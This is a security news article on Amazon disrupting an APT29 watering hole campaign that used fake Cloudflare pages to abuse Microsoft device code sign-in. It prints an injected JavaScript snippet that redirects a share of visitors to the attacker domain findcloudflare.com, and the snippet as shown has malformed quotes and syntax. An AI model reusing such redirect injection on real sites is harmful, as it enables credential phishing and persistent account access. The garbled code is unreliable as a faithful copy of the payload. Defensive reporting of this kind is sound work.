Amazon’s threat intelligence team uncovered a sophisticated watering hole campaign in late August 2025, which is orchestrated by APT29, also known as Midnight Blizzard, a Russian Foreign Intelligence Service–linked actor.
The operation relied on the compromise of legitimate websites to redirect unsuspecting visitors to malicious infrastructure.
Once redirected, users encountered counterfeit Cloudflare verification pages designed to harvest credentials and trick victims into authorizing attacker-controlled devices through Microsoft’s device code authentication flow.
The campaign’s breadth was striking: approximately 10 percent of site visitors were siphoned off to actor-controlled domains such as findcloudflare[.]com and cloudflare.redirectpartners[.]com.
These domains mimicked official security checks so convincingly that many users failed to detect the ruse.
Amazon analysts noted that this approach marked a significant evolution in APT29’s tradecraft. Instead of relying solely on phishing emails or targeted spear-phishing, the group employed opportunistic injection of obfuscated JavaScript into compromised sites.
This tactic broadened their potential victim pool by embedding malicious redirects directly into popular web pages.
Visitors were often unaware they were being rerouted until prompted to enter device codes or approve new device authorizations—actions that granted the threat actor persistent access.
The impact of this campaign extended beyond mere credential theft. By integrating with Microsoft’s device code authentication, APT29 could persist within corporate environments, leveraging authorized sessions to move laterally and gather intelligence.
Although no AWS systems were compromised, the incident underscored the persistent threat posed by state-sponsored actors adapting their methods to evade traditional defenses.
Amazon worked rapidly with Cloudflare, Microsoft, and other providers to dismantle the malicious domains and isolate compromised EC2 instances, illustrating the power of coordinated industry response.
Technical Overview of Obfuscated JavaScript
A closer look at the injected script reveals several advanced evasion techniques. The JavaScript payload was base64-encoded to mask its true purpose, and randomization logic redirected only a subset of visitors, reducing the likelihood of detection.
Once decoded, the snippet performed a server-side redirect to the fraudulent authentication page while setting cookies to prevent repeated redirects of the same user. A simplified version of the decoded code appears below:-
(function(){
var uid = Math.random().toString(36).substring(2);
if (!document.cookie.includes('redir="+uid) && Math.random()<0.1) {
document. Cookie = "redir="+uid+";path=/';
window.location.replace('https://findcloudflare.com/device/code?auth=' + uid);
}
})();This snippet exemplifies APT29’s shift from client-side to server-side redirects when previous infrastructure was disrupted.
By rapidly migrating to new domains and refining their code, the group sustained their campaign despite ongoing takedowns.
Amazon’s successful disruption of this infrastructure highlights the necessity for continuous monitoring of web-based threats and collaboration across the security community.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
The post Amazon Dismantles Russian APT 29 Infrastructure Used to Attack Users appeared first on Cyber Security News.
Source link
